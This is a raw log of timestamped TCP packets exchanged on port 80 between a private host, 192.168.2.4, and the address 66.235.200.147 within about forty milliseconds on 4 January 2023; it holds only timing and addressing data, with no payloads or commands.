Jan 4, 2023 16:47:38.902652025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902713060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902720928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902759075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902774096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902806044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902817011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902852058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902861118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902896881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902940035 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.902975082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902975082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.902983904 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.903029919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.903044939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.903044939 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.903076887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.903088093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.903140068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921360016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921412945 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921509981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921551943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921582937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921593904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921593904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921608925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921634912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921638966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921659946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921662092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921674967 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921685934 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921700001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921710968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921729088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921746016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921761036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921772957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921787977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921798944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921814919 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921825886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921842098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921853065 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921871901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921880007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921888113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921910048 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921928883 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.921945095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.921983004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922013998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922024965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922051907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922058105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922086954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922094107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922126055 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922133923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922152042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922167063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922179937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922192097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922205925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922220945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922234058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922255993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922257900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922281981 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922283888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922292948 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922311068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922326088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922336102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922353029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922362089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922378063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922388077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922404051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922415972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922434092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922442913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922460079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922470093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922485113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922504902 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922512054 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922539949 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922544956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922574043 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922581911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922600031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922615051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922626972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922646999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922653913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922662020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922681093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922693968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922728062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922736883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922763109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922777891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922787905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922806025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922813892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922820091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922841072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922852993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922867060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922879934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922894001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922914982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922921896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922940969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922949076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922954082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.922975063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.922992945 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923000097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923013926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923026085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923037052 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923052073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923065901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923077106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923091888 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923105001 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923119068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923131943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923146963 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923160076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923173904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923191071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923201084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923233032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923383951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923410892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923435926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923438072 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923455954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923463106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923480034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923489094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923516035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923517942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923541069 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923546076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923557997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923573971 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923604012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923605919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923629045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923643112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923651934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923681974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923687935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923710108 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923724890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923744917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923753977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923782110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923787117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923813105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923826933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923839092 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923856020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923863888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923890114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923907042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923916101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923921108 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923935890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923940897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923966885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.923966885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923980951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.923995018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924010038 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924040079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924277067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924304008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924330950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924338102 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924356937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924362898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924375057 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924384117 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924401999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924411058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924429893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924438000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924455881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924465895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924482107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924493074 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924509048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924525023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924536943 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924562931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924573898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924598932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924611092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924628019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924643993 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924654007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924669027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924679041 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924704075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924705029 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924729109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924734116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924751997 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924761057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924778938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924787045 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924803019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924813032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924829960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924839020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924855947 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924866915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.924884081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.924911976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925256968 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925285101 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925312042 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925322056 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925338984 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925340891 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925354004 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925365925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925384998 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925393105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925415039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925421000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925436974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925447941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925476074 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925477982 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925493002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925515890 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925523043 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925553083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925564051 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925580025 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925596952 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925606012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925623894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925632954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925648928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925659895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925677061 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925685883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925705910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925713062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925721884 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925739050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925760031 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925765991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925791979 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925793886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925806046 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925818920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925829887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925858021 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.925868034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.925916910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.926234007 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.926263094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.926292896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.926299095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.926320076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.926326990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.926338911 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.926347017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.926364899 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.926373959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.926393032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.926457882 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942003965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942049026 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942071915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942090988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942117929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942143917 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942169905 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942194939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942220926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942248106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942274094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942298889 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942301035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942301035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942329884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942354918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942379951 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942383051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942380905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942380905 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942406893 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942411900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942428112 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942439079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942466021 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942466974 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942481041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942492962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942511082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942519903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942538023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942547083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942565918 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942573071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942595005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942600012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942620039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942627907 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942645073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942653894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942675114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942682028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942732096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942742109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942742109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942760944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942780018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942797899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942809105 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942814112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942821980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942848921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942857027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942877054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942888975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942905903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.942917109 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.942930937 CET	49696	80	192.168.2.4	66.235.200.147
